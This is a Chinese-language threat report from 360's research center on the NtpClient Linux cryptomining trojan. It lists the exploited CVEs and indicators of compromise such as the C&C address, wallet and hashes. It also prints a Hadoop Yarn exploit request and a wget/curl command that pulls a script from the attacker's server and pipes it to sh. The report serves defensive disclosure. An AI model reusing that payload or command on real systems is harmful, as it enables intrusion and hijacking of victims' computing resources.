Linux挖矿木马NtpClient事件分析
2021-10-13 14:37

报告编号:B6-2021-101302

报告来源:360高级威胁研究分析中心

报告作者:360高级威胁研究分析中心

更新日期:2021-10-13

0x01   事件简述

360安全大脑监测发现最新的NtpClient挖矿木马攻击。该木马利用Drupal、WebLogic、Confluence、MongoDB等众多流行框架漏洞进行传播,入侵机器后占用系统资源进行挖矿,严重影响主机上的正常业务运转。由于其最终投递的木马文件名为ntpclient,遂将其命名为NtpClient挖矿木马。

0x02   分析

分析样本后发现,NtpClient挖矿木马使用到了以下11种漏洞利用方式进行入侵攻击:

漏洞编号漏洞名称
CVE-2018-7600Drupal远程代码执行漏洞
CVE-2020-14882WebLogic远程代码执行漏洞
CVE-2019-3396Confluence远程代码执行漏洞
CVE-2019-10758MongoDB mongo-express远程代码执行漏洞
CVE-2017-11610Supervisord远程命令执行漏洞
N/AXXL-JOB executor未授权访问漏洞
N/AHadoop Yarn REST API未授权漏洞
N/A未知,疑似2021.07.06披露的Visual Tools DVR VX16 4.2.28.0命令注入漏洞
CVE-2020-28870InoERP 0.7.2远程代码执行漏洞
CVE-2020-35729Klog Server 2.4.1命令注入漏洞
CVE-2019-12725Zeroshell操作系统命令注入漏洞

以Hadoop Yarn REST API未授权漏洞为例,该漏洞利用的恶意payload如下:

POST /ws/v1/cluster/apps HTTP/1.1
Host: %s:%d
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.26.0
Content-Type: application/json
Content-Length: %d
{"am-container-spec": {"commands": {"command": "%s"}}, "application-id": "app_id", "application-type": "YARN", "application-name": "get-shell"}

成功利用漏洞后执行恶意命令:

wget http://185.243.56.167/yarn -O- |sh;curl http://185.243.56.167/yarn |sh

该命令从C&C下拉恶意脚本yarn并执行。yarn恶意脚本首先进行了一些系统的清理工作,例如清除crontab定时任务,删除.profile、.bashrc文件中的wget、curl恶意下载任务,清理CPU占用超过55%以及其他一些可疑进程等等。

主机环境清理完毕后从C&C拉取ntpclient木马并在执行后自删除。

其余漏洞的攻击方式大同小异,均为成功利用后下载对应的恶意脚本文件并执行,脚本在清理系统环境后拉取木马文件,实现完整的入侵流程。NtpClient挖矿木马包含的恶意sh脚本列表如下:

http://185.243.56.167/drupal2
http://185.243.56.167/web
http://185.243.56.167/wid
http://185.243.56.167/mongo
http://185.243.56.167/rpc
http://185.243.56.167/job
http://185.243.56.167/yarn
http://185.243.56.167/dl
http://185.243.56.167/zero

ntpclient木马ELF样本中除了清理/etc/ld.so.preload文件外,也会尝试清理竞品挖矿木马和一些安全软件,以确保自己能独占系统资源。

样本中包含了编译于2021.9.23号的XMRig开源矿机程序:

矿池和钱包地址分别为

pool.hashvault.pro:80

4At34d6VnRdEHZAEMuXeYFRTnneXXYheqX2PrJ8PXpi6KC1YnTXNyWXLYzRK52jWEcAtQAMpeLhw3P1AHgnBGNy22YtJtF3

根据已连接到矿池的矿工数来看,目前的感染量为151,正处于初期发展阶段。从算力趋势图推测可知,NtpClient挖矿木马从9.24号开始活跃,在9.28~9.29号间有了一次较大的增大。

0x03   IoCs:

C&C:

http://185.243.56.167/

toxj6876sr7074hykwejfs.onion

y7myrhlz4hzpmlmt.onion

MD5:

md5类型
8d6cbc8756ffeb3c6546660dd17b75a8elf
27e307f8ce9d320be0de5f4ad011403celf
33f4e3f575995b2adb2b418377eb6943elf
4220847c297c628e72c7a999e664a765elf
f96cde4c2ceb1a31fde866d9eae4064aelf
f581c2a44f48515d16e6aac842e80461elf
fe4f7eb659d98b8cf241bf8e8476fbf0elf
bcbbcc97a91cae59e9c05bb4378c4645shell
f4cec4950cbb56ebeb35f84999581b10shell
f689fc0cff0bf97a0fcf3850ed5fe9cdshell
31674cd832540031a64dcd11df002e1dshell
6ff6a2b73cf2f0f3a206bf23cada5a53shell
29feb2ccf71512edc62d857056949a26shell
108a87ae54ae31abc87cbfe73d87d78dshell
cfef804c1c9ed2f7c6e8ee69fa0c83d3shell
5e9833571b5883217b1105e5460da35dshell
4e97bd1559b06a07b9aebcea18320f80shell
b23aa750f6b02250eacc991988cb641cshell
8e8943cd6f96ff70b3d62f09b7636958shell

矿池:

pool.hashvault.pro:80

钱包地址:

4At34d6VnRdEHZAEMuXeYFRTnneXXYheqX2PrJ8PXpi6KC1YnTXNyWXLYzRK52jWEcAtQAMpeLhw3P1AHgnBGNy22YtJtF3

文件路径:

/tmp/.a
/var/tmp/.a
/run/shm/a
/dev/.a
/dev/shm/.a
/run/user/1000/ntpclient
/run/user/1000/Mozz

0x04   产品侧解决方案

若想了解更多产品信息或有相关业务需求,可移步至http://360.net。

360AISA全流量威胁分析系统

针对微软本次安全更新,360AISA已基于流量侧提供对应检测能力更新,请AISA用户联系techsupport@360.cn获取更新,尽快升级检测引擎和规则,做好安全防护工作。

360安全卫士

Windows用户可通过360安全卫士实现对应补丁安装、漏洞修复、恶意软件查杀,其他平台的用户可以根据修复建议列表中的安全建议进行安全维护。

360CERT建议广大用户使用360安全卫士定期对设备进行安全检测,以做好资产自查以及防护工作。

360本地安全大脑

360本地安全大脑是将360云端安全大脑核心能力本地化部署的一套开放式全场景安全运营平台,实现安全态势、监控、分析、溯源、研判、响应、管理的智能化安全运营赋能。360本地安全大脑已支持对相关漏洞利用的检测,请及时更新网络神经元(探针)规则和本地安全大脑关联分析规则,做好防护。

360终端安全管理系统

360终端安全管理系统软件是在360安全大脑极智赋能下,以大数据、云计算等新技术为支撑,以可靠服务为保障,集防病毒与终端安全管控功能于一体的企业级安全产品。

360终端安全管理系统已支持对相关漏洞进行检测和修复,建议用户及时更新漏洞库并安装更新相关补丁。

0x05   时间线

2021-10-13 360高级威胁研究分析中心发布通告